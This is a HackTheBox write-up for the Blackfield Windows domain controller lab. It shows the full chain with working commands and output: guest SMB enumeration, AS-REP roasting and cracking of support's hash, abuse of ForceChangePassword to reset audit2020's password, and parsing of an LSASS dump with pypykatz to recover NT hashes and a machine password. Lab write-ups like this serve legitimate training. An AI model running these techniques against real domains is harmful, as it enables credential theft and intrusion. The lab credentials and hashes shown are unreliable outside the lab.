![[HackTheBox] Blackfield](https://cdn.hashnode.com/res/hashnode/image/upload/v1733663006657/949810b6-ab2d-42ad-b634-9b44a650bae1.png?w=1600&h=840&fit=crop&crop=entropy&auto=compress,format&format=webp)
Table of contents
- Footprinting
- Privilege escalation
- ntdsutil.exe / DSInternals extraction method (NTDS + SYSTEM) (requires admin !)
- PsExec isn’t possible ? :(
Just another Anonynous-Guest / ASREPRoast / ForceChangePassword / UserEnum / LSASS / Registry Hive / NTDS_SAM-SYSTEM Decryption Write-up.
There might be some discrepencies in this article. Indeed, I will sometimes use
cme, and some other timesnxc. The methodology, however, remains identical. In the context of this article,cmeandnxcare interchangeable.
Footprinting
Open ports
The open ports found by a classic Nmap SYN scan are:
jamarir@kali:~$ nmap -p- -v10 -Pn --disable-arp-ping -oN tcp_full.nmap 10.10.10.192
[...]
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
The ports:
135/593 (RPC), 139/445 (Netbios/SMB), 5985 (WinRM) show this is a Windows machine.
53 (DNS), 389 (LDAP), but most importantly 88 (Kerberos) shows this is a Domain Controller.
As a DNS server, let’s add it to our local DNS server resolver:
jamarir@kali:~$ sudo sed -i '1i nameserver 10.10.10.192' /etc/resolv.conf
Our target is a Windows 10 Server 2019 DC, whose FQDN (Fully Qualified Domain Name) is DC01.BLACKFIELD.local:
jamarir@kali:~$ nxc smb 10.10.10.192
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
Null or Guest SMB Spider ?
The null/anonymous account is disabled. Indeed, providing a blank username and password isn’t allowed:
jamarir@kali:~$ nxc smb 10.10.10.192 -u '' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\:
SMB 10.10.10.192 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
Howbeit, the Guest account is allowed, using the username a for example, and a blank password:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'a' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\a: (Guest)
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL Logon server share
We could also have used the username Guest (case-insensitive) instead, giving the same result:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'guest' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\guest:
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL Logon server shar
By default, the Guest account is disabled. When enabled, it has a blank password by default, and has limited access to the local server or domain.
Also, notice how the account a is considered to be a Guest account in the first nxc’s output above. Here’s the Wireshark traffic when authenticating with the credentials a: :
The request is made by a, but the server interprets our authentication as Guest, setting SMB2_SESSION_FLAG_IS_GUEST to true. As this WhiteFlag’s article shows, when the account used to authenticate (a here) isn’t known by the server, it implicitely switches to the Guest account (domainly or locally).
As the Microsoft’s documentation states: “Every computer has a local Guest account, and every domain has a domain Guest account. […] Unlike Anonymous Logon, Guest is a real account, and it can be used to sign in interactively. The Guest account doesn't require a password [by default], but it can have one.”
Notice that putting a password on
Guestisn’t allowed, as its password is literally blank:jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Guest' -p 'a' --shares SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Guest:a STATUS_LOGON_FAILUREThus, to limit unauthorized access, the
Guestdomain AND local accounts must be disabled.
So the Guest account is enabled, and we can access some shares, especially the profiles$ one, which contains a LOT of user directories:
jamarir@kali:~$ smbclient.py 'BLACKFIELD.local/a:@10.10.10.192'
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use profiles$
# ls
drw-rw-rw- 0 Wed Jun 3 18:47:12 2020 .
drw-rw-rw- 0 Wed Jun 3 18:47:12 2020 ..
drw-rw-rw- 0 Wed Jun 3 18:47:11 2020 AAlleni
drw-rw-rw- 0 Wed Jun 3 18:47:11 2020 ABarteski
drw-rw-rw- 0 Wed Jun 3 18:47:11 2020 ABekesz
[...]
```
The directories are empty, for example:
# cd WZelazny
# ls
drw-rw-rw- 0 Wed Jun 3 18:47:12 2020 .
drw-rw-rw- 0 Wed Jun 3 18:47:12 2020 ..
Instead of looking each directory one by one, we could use the NetExec’s spider_plus module, which returns the share’s directory architecture:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'a' -p '' -d BLACKFIELD.local -M spider_plus -o OUTPUT_FOLDER='nxc_spider_plus' DOWNLOAD_FLAG='False' EXCLUDE_FILTER='PRINT$,IPC$' EXCLUDE_EXTS='ico,lnk,svg'
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.10.192 445 DC01 [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.10.192 445 DC01 [*] STATS_FLAG: True
SPIDER_PLUS 10.10.10.192 445 DC01 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.10.192 445 DC01 [*] EXCLUDE_EXTS: ['ico', 'lnk', 'svg']
SPIDER_PLUS 10.10.10.192 445 DC01 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.10.192 445 DC01 [*] OUTPUT_FOLDER: nxc_spider_plus
[...]
SPIDER_PLUS 10.10.10.192 445 DC01 [+] Saved share-file metadata to "nxc_spider_plus/10.10.10.192.json".
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Shares: 7 (ADMIN$, C$, forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Readable Shares: 2 (IPC$, profiles$)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Total folders found: 314
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Total files found: 0
No file is present in any of the folders:
jamarir@kali:~$ cat nxc_spider_plus/10.10.10.192.json
{
"profiles$": {}
}%
We could also double-check that result mounting this share locally, and exploring it ourselves, but nothing is returned as well:
jamarir@kali:~$ sudo umount /mnt 2>/dev/null; sudo mount -t cifs -o 'username=a,password=,domain=BLACKFIELD.local' '//10.10.10.192/profiles$' /mnt/; jamarir@kali:~$ find /mnt/ -type f [Blank output]
ASREPRoast, as usual !
You might check my Sauna CTF article, among many resources, for more details on this attack.
We actually have a list of usernames, so, according to the WADComs’s cheatsheet, we could either:
Perform a password spray attack (where 1 password is tried against all users). However, we have no good password candidate for this attack, so we can let this one aside.
Check which account is ASREPRoastable (where the user doesn’t have to provide credentials when it authenticates against the DC).
To perform that second option, we can Regexly extract usernames using:
-
jamarir@kali:~$ smbclient --user 'BLACKFIELD.local/a' --password '' '//10.10.10.192/profiles$' -c 'ls' |grep -v 'blocks available' |grep -oP '^\s+\K[^. ]+' > users.txt Or
smbclient.pyscript from the impacket’s suite:jamarir@kali:~$ smbclient.py -no-pass 'BLACKFIELD.local/a@10.10.10.192' <<<$(echo 'use profiles$\nls') |grep -oP '^drw-rw-rw-.*?2020 \K[^. ]+$' > users.txt
And look for ASREPRoastable accounts using the impacket’s GetNPUsers.py script:
Note that most of the directories are actually non-existent users. We filter these by removing the
KDC_ERR_C_PRINCIPAL_UNKNOWNerror in the output:
jamarir@kali:~$ GetNPUsers.py -dc-ip 10.10.10.192 BLACKFIELD.local/ -usersfile users.txt -format hashcat |grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:7e050d621bda7d00bd78ab90d68f001e$2ec0c0424b454dd161bd712dc926d2487ac2d3658f3963c063941937fb627d91ba887ad20df5a00ba42c2ba0d275a66c12c147b06134dc191146418cd10b7ffd0a6e809c7ab6d17cfe0a2d0e256c066671329129a8f7e6581a457dfe9849809fbf5b31a21d4ce566e4052abd4f01e5130566cb8c3696551cd183fee995a5c36a2f6de5c84f01551db339a16bdece881e2f7c801acf5d07fc8ac0564c2fb6e647660b699339ae129225666b61f7b239771e5f6189188a0e810b36300e567867fe52f7e578680fd7055c2df21c94fdbed2c32a1b7fec44f234ac320a653f281c7460aa2c5f4925ee03576f7ee4d26b1d9d61092394
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
3 domain users exist: audit2020, support, and svc_backup. support is ASREPRoastable, as we got its TGT. Therefore, we may crack its TGT's NTHash:
jamarir@kali:~$ echo '$krb5asrep$23$support@BLACKFIELD.LOCAL:7e[...]94' |john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin
[...]
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)
Bingo!! Now, with a domain account, we can access LDAP and fire up BloodHound, and start some privesc stuff !
jamarir@kali:~$ bloodhound.py -u 'support' -p '#00^BlackKnight' -d 'blackfield.local' -dc dc01.blackfield.local -ns 10.10.10.192 -c all --zip
Privilege escalation
BloodHound reveals that only the SVC_BACKUP domain user can access a WinRM session in the DC, being a member of the Remote Management Users domain group:
So, we’ll probably need to impersonate SVC_BACKUP to get a foothold on the box.
support, support audit2020's password reset plz !
BloodHound shows that support has the ForceChangePassword right on audit2020, whose Help popup shows:
Note that support has access over the RPC, LDAP and SMB protocols on DC01.BLACKFIELD.LOCAL:
jamarir@kali:~$ for proto in ssh smb rdp vnc winrm ldap mssql wmi ftp; do (nxc $proto 10.10.10.192 -u 'support' -p '#00^BlackKnight' &); done
RPC 10.10.10.192 135 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
Then, we can easily exploit that privesc by updating audit2020’s password, using:
Set-DomainUserPasswordfrom the PowerSploit’s GitHub repo (copied inDocuments\WindowsPowerShell\Modules):PS C:\Users\jamarir> (Get-ChildItem $env:USERPROFILE\Documents\WindowsPowerShell\Modules).Name PowerSploit-master PS C:\Users\jamarir> Import-Module -Force $env:USERPROFILE\Documents\WindowsPowerShell\Modules\PowerSploit-master\PowerSploit.psm1 PS C:\Users\jamarir> Set-DomainUserPassword -Identity 'audit2020' -AccountPassword (ConvertTo-SecureString 'SuperAud1t2021!' -AsPlainText -Force) -Domain BLACKFIELD.LOCAL -Credential (New-Object System.Management.Automation.PSCredential('BLACKFIELD.LOCAL\support',(ConvertTo-SecureString '#00^BlackKnight' -AsPlainText -Force)))Or
rpcclient:jamarir@kali:~$ rpcclient 10.10.10.192 -c 'setuserinfo2 audit2020 23 "SuperAud1t2021!";quit' -U BLACKFIELD.local/'support'%'#00^BlackKnight'Or
net rpc password:jamarir@kali:~$ net rpc password 'audit2020' 'SuperAud1t2021!' -U BLACKFIELD.local/'support'%'#00^BlackKnight' -S "BLACKFIELD.local"
A password policy forbids the username being in the password:
jamarir@kali:~$ net rpc password "audit2020" 'SuperAudit2021!' -U BLACKFIELD.local/'support'%'#00^BlackKnight' -S "BLACKFIELD.local" Failed to set password for 'audit2020' with error: Unable to update the password. The value provided for the new password does not meet the length, complexity, or history requirements of the domain..Indeed, the domain’s password policy’s complex flag is set:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'support' -p '#00^BlackKnight' --pass-pol SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight SMB 10.10.10.192 445 DC01 [+] Dumping password info for domain: BLACKFIELD SMB 10.10.10.192 445 DC01 Minimum password length: 7 SMB 10.10.10.192 445 DC01 Password history length: 24 SMB 10.10.10.192 445 DC01 Maximum password age: 41 days 23 hours 53 minutes SMB 10.10.10.192 445 DC01 SMB 10.10.10.192 445 DC01 Password Complexity Flags: 000001 SMB 10.10.10.192 445 DC01 Domain Refuse Password Change: 0 SMB 10.10.10.192 445 DC01 Domain Password Store Cleartext: 0 SMB 10.10.10.192 445 DC01 Domain Password Lockout Admins: 0 SMB 10.10.10.192 445 DC01 Domain Password No Clear Change: 0 SMB 10.10.10.192 445 DC01 Domain Password No Anon Change: 0 SMB 10.10.10.192 445 DC01 Domain Password Complex: 1 SMB 10.10.10.192 445 DC01 SMB 10.10.10.192 445 DC01 Minimum password age: 1 day 4 minutes SMB 10.10.10.192 445 DC01 Reset Account Lockout Counter: 30 minutes SMB 10.10.10.192 445 DC01 Locked Account Duration: 30 minutes SMB 10.10.10.192 445 DC01 Account Lockout Threshold: None SMB 10.10.10.192 445 DC01 Forced Log off Time: Not SetAs we can read in the Microsoft’s documentation, the password must contain at least 3 character-categories, and it CAN’T contain the user’s
samAccountNameordisplayName(case-insensitive). So the following users cannot have theirsAMAccountNameordisplayNamein their respective password:jamarir@kali:~$ nxc ldap 10.10.10.192 -u 'support' -p '#00^BlackKnight' -d 'BLACKFIELD.local' --query "(&(objectClass=person)(!(lastlogon=0)))" "sAMAccountName displayName" SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local LDAP 10.10.10.192 389 DC01 sAMAccountName: Administrator LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=Guest,CN=Users,DC=BLACKFIELD,DC=local LDAP 10.10.10.192 389 DC01 sAMAccountName: Guest LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=DC01,OU=Domain Controllers,DC=BLACKFIELD,DC=local LDAP 10.10.10.192 389 DC01 sAMAccountName: DC01$ LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=support,CN=Users,DC=BLACKFIELD,DC=local LDAP 10.10.10.192 389 DC01 sAMAccountName: support LDAP 10.10.10.192 389 DC01 [+] Response for object: CN=svc_backup,CN=Users,DC=BLACKFIELD,DC=local LDAP 10.10.10.192 389 DC01 sAMAccountName: svc_backup(N.B. : None of these LDAP entries have a
displayNameattribute.)
Now, we compromised the account audit2020:SuperAud1t2021! !
Side-note : Enumerate valid domain accounts
Notice that in order to retrieve valid accounts in the domain (i.e. without KDC_ERR_C_PRINCIPAL_UNKNOWN error), we might:
LDAP-filter accounts who didn’t logged in at least once
(!(lastlogon=0))(see above query). However, this might return false positives, where a valid account has never logged on.Use the
kerbruteenumerator, which requests a TGT for a user and filter the requests of existing domain users:
jamarir@kali:~$ kerbrute userenum -d BLACKFIELD.local --dc 10.10.10.192 users.txt
[...]
<DATE> > Using KDC(s):
<DATE> > 10.10.10.192:88
<DATE> > [+] VALID USERNAME: audit2020@BLACKFIELD.local
<DATE> > [+] VALID USERNAME: support@BLACKFIELD.local
<DATE> > [+] VALID USERNAME: svc_backup@BLACKFIELD.local
<DATE> > Done! Tested 314 usernames (3 valid) in 161.354 seconds
audit2020, forensic the share plz !
audit2020 has READ access to an uncommon share named forensic:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'audit2020' -p 'SuperAud1t2021!' -d BLACKFIELD.local --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:SuperAud1t2021!
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
We may use the spider_plus module of nxc, this time, to dump it locally (DOWNLOAD_FLAG='True' option):
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'audit2020' -p 'SuperAud1t2021!' -d BLACKFIELD.local -M spider_plus -o OUTPUT_FOLDER='forensic_dump' DOWNLOAD_FLAG='True' EXCLUDE_FILTER='PRINT$,IPC$,NETLOGON,SYSVOL,profiles$' EXCLUDE_EXTS='ico,lnk,svg'
[...]
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Shares: 7 (ADMIN$, C$, forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Readable Shares: 5 (forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] SMB Filtered Shares: 4
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Total folders found: 38
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Total files found: 720
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Files filtered: 257
SPIDER_PLUS 10.10.10.192 445 DC01 [*] File size average: 985.69 KB
SPIDER_PLUS 10.10.10.192 445 DC01 [*] File size min: 0 B
SPIDER_PLUS 10.10.10.192 445 DC01 [*] File size max: 125.87 MB
SPIDER_PLUS 10.10.10.192 445 DC01 [*] File unique exts: 21 (.lib, .txt, .png, .dll, .py, .cnt, .hlp, .md, .pl, .c...)
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Downloads successful: 447
SPIDER_PLUS 10.10.10.192 445 DC01 [*] Downloads failed: 16
jamarir@kali:~$ tree forensic_dump -d
nxc_spider_plus
└── 10.10.10.192
└── forensic
├── commands_output
└── tools
├── sleuthkit-4.8.0-win32
│ ├── bin
│ ├── lib
│ └── licenses
├── sysinternals
└── volatility
├── contrib
│ ├── library_example
│ └── plugins
│ ├── aspaces
│ └── malware
├── pyinstaller
├── resources
├── tools
│ ├── doxygen
│ │ └── d3
│ ├── linux
│ │ └── kcore
│ ├── mac
│ └── windows
└── volatility
├── plugins
│ ├── addrspaces
│ ├── gui
│ │ └── vtypes
│ ├── linux
│ ├── mac
│ ├── malware
│ ├── overlays
│ │ ├── linux
│ │ ├── mac
│ │ └── windows
│ └── registry
├── renderers
└── win32
We’re not that interested in the tools’s folder, as it mostly contains standard forensic tools.
The
memory_analysisdirectory wasn’t dumped bynxc:jamarir@kali:~$ smbclient.py 'BLACKFIELD.local/audit2020:SuperAud1t2021!@10.10.10.192' [...] # use forensic # ls drw-rw-rw- 0 Sun Feb 23 16:10:16 2020 . drw-rw-rw- 0 Sun Feb 23 16:10:16 2020 .. drw-rw-rw- 0 Sun Feb 23 19:14:37 2020 commands_output drw-rw-rw- 0 Thu May 28 22:29:24 2020 memory_analysis drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 toolsThat’s because, by default, the max file sizes to download is set to 51K (
MAX_FILE_SIZEoption):jamarir@kali:~$ nxc smb -M spider_plus --options [*] spider_plus module options: List files recursively (excluding `EXCLUDE_FILTER` and `EXCLUDE_EXTS` extensions) and save JSON share-file metadata to the `OUTPUT_FOLDER`. If `DOWNLOAD_FLAG`=True, download files smaller then `MAX_FILE_SIZE` to the `OUTPUT_FOLDER`. DOWNLOAD_FLAG Download all share folders/files (Default: False) STATS_FLAG Disable file/download statistics (Default: True) EXCLUDE_EXTS Case-insensitive extension filter to exclude (Default: ico,lnk) EXCLUDE_FILTER Case-insensitive filter to exclude folders/files (Default: print$,ipc$) MAX_FILE_SIZE Max file size to download (Default: 51200) OUTPUT_FOLDER Path of the local folder to save files (Default: /tmp/nxc_spider_plus)Instead, we could increase that
MAX_FILE_SIZEvalue, or mount the share locally to check thememory_dump’s folder in/mnt:jamarir@kali:~$ nxc smb 10.10.10.192 -u 'audit2020' -p 'SuperAud1t2021!' -d BLACKFIELD.local -M spider_plus -o OUTPUT_FOLDER='forensic_dump' DOWNLOAD_FLAG='True' EXCLUDE_FILTER='PRINT$,IPC$,NETLOGON,SYSVOL,profiles$' EXCLUDE_EXTS='ico,lnk,svg' MAX_FILE_SIZE=999999 jamarir@kali:~$ sudo umount /mnt 2>/dev/null; sudo mount -t cifs -o 'username=audit2020,password=SuperAud1t2021!,domain=BLACKFIELD.local' '//10.10.10.192/forensic' /mnt; jamarir@kali:~$ ls -lhs /mnt/memory_analysis/ total 495M 13M -rwxr-xr-x 1 root root 13M May 28 2020 RuntimeBroker.zip 126M -rwxr-xr-x 1 root root 126M May 28 2020 ServerManager.zip 18M -rwxr-xr-x 1 root root 18M May 28 2020 WmiPrvSE.zip 37M -rwxr-xr-x 1 root root 37M May 28 2020 conhost.zip 24M -rwxr-xr-x 1 root root 24M May 28 2020 ctfmon.zip 23M -rwxr-xr-x 1 root root 23M May 28 2020 dfsrs.zip 18M -rwxr-xr-x 1 root root 18M May 28 2020 dllhost.zip 8.5M -rwxr-xr-x 1 root root 8.5M May 28 2020 ismserv.zip 40M -rwxr-xr-x 1 root root 40M May 28 2020 lsass.zip 62M -rwxr-xr-x 1 root root 62M May 28 2020 mmc.zip 32M -rwxr-xr-x 1 root root 32M May 28 2020 sihost.zip 33M -rwxr-xr-x 1 root root 33M May 28 2020 smartscreen.zip 14M -rwxr-xr-x 1 root root 14M May 28 2020 svchost.zip 34M -rwxr-xr-x 1 root root 34M May 28 2020 taskhostw.zip 14M -rwxr-xr-x 1 root root 14M May 28 2020 winlogon.zip 3.9M -rwxr-xr-x 1 root root 3.9M May 28 2020 wlms.zip
Rabbit hole (Unpwn3dCompany)
The commands_output folder reveals a user named Ipwn3dYourCompany in the Domain Admins group:
jamarir@kali:~$ cat commands_output/domain_admins.txt
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.
Trying a password spray using this username as the password doesn’t reveal valid credentials on the existing domain accounts :/
jamarir@kali:~$ cat valid_users.txt
Administrator
Guest
DC01$
support
svc_backup
jamarir@kali:~$ nxc smb 10.10.10.192 -u valid_users.txt -p 'Ipwn3dYourCompany' -d BLACKFIELD.local
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Administrator:Ipwn3dYourCompany STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Guest:Ipwn3dYourCompany STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\DC01$:Ipwn3dYourCompany STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\support:Ipwn3dYourCompany STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\svc_backup:Ipwn3dYourCompany STATUS_LOGON_FAILURE
LSA OverViewed
However, there’s an interesting lsass.zip archive, which contains an LSASS dump:
jamarir@kali:~$ unzip -l lsass.zip
Archive: lsass.zip
Length Date Time Name
--------- ---------- ----- ----
143044222 2020-02-23 11:02 lsass.DMP
--------- -------
143044222 1 file
Windows authentication
You may check the Microsoft’s documentation on Windows Authentication Concepts, Security Principals, Credentials Processes in Windows Authentication, LSA Protection Configuration, Cached and Stored Credentials Technical Overview, this Synacktiv’ article, or this hackndo’s article, among many other resources, for more details.
An Account, also named a Security Principal is any local or domain entity able to authenticate to an OS, identified with a unique SID (Security IDentifier). When an account (user, computer, service) authenticates in Windows, its credentials are validated by the LSA (Local Security Authority), against :
The computer’s SAM database (in the registry) for local authentications. Here, the LSA verifies the credentials’.
The DC’s AD database (in
NTDS.dit) for domain authentications. Here, the LSA forwards the credentials to the account’s issuer for verification.
The LSA is responsible for determining if the authentication is the local or domain-based, as well as maintaining the computer’s local security policy.
When a successful authentication occurs, the sign-in process returns the account’s SIDs (identity and groups). These SIDs are used by the LSA to create the account’s (primary) access token. Any thread running on the account’s behalf has this token attached.
Therefore, whenever the process performs an action, the OS can check its permissions looking at its attached access token.
When a successful local authentication occurs, the sign-in process locally caches, in memory, the account’s credentials in the LSA. This LSA cache provides SSO (Single Sign-On) to the account, freeing it from re-entering its credentials for each remote service (e.g. SMB, Exchange Server, SharePoint, …).
Indeed, with an LSA cache on a computer, the authentication process becomes local. Therefore, if the user updates his cloud-password, he may still access the computer locally with his old password, if the LSA cache isn’t cloud-synchronized yet. In particular, computers that are DC-disconnected authenticate users based on the cached LSA credentials.
LSA or LSASS ?!
The LSA contains 2 services:
The LSA Subsystem Service (LSASS), which caches the active users’ sessions credentials in memory on the computer.
The LSA Server Service (LSASS), which keeps track of the account and security policies on the computer.
We are mostly interested on the service caching credentials. Cached credentials:
Are those of unclosed sessions from the last restart.
Are created in any of the following circumstances on the computer:
Logging to RDP (locally or remotely).
Running a task using RunAs or a remote administration tool.
Running a service, a scheduled task, or a batch job.
Can be in any of the following forms:
Reversible encrypted plaintext.
TGT or TGS.
NTHash, or LMHash if enabled.
A traveler analogy…
To use the travel analogy, when the traveler arrives at the international border, his identity is checked by the LSA guard for journeys in the same local continent. However, if you go to another continent using an airplane, the LSA guard forwards your request to the corresponding Airplane Controller guard that holds a legitimate copy of your ID.
When authenticated, you’re assigned a citizen ticket which will identify you for every action you’ll make. For example, if you want to access a sport event, you can use that citizen ticket to prove your identity.
Finally, if you want to travel in the local continent, you don’t need to authenticate your ID again. Indeed, the LSA guard already knows you.
Image taken from Microsoft.
Logonpasswords them all !
Dumping processes can be used for debugging purposes, such as diagnotizing a program crashed. We can dump processes we have rights on, such as the ones we created ourselves, using :
- The Task Manager :
The
ProcDumptool, from the Sysinternals suite :PS C:\Users\jamarir> procdump64.exe -ma Explorer Notepad.dmp ProcDump v10.11 - Sysinternals process dump utility Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com [<DATE>] Dump 1 initiated: C:\Users\jamarir\Downloads\Notepad.dmp [<DATE>] Dump 1 writing: Estimated dump file size is 451 MB. [<DATE>] Dump 1 complete: 451 MB written in 9.5 seconds [<DATE>] Dump count reached.
Because the loggedon sessions’ credentials are locally cached by the LSASS, we can parse such dumps, and extract secrets, using :
- The pypykatz tool:
jamarir@kali:~$ pypykatz lsa minidump lsass.DMP |grep -vP '^[\S]+\s*|\s+?.*? ?(None|\(hex\)|:\s*)$'
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
[...]
== MSV ==
Username: DC01$
Domain: BLACKFIELD
LM: NA
NT: b624dc83a27cc29da11d9bf25efea796
SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
DPAPI: 0000000000000000000000000000000000000000
== WDIGEST [5950b]==
username DC01$
domainname BLACKFIELD
== Kerberos ==
Username: DC01$
Domain: BLACKFIELD.local
Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
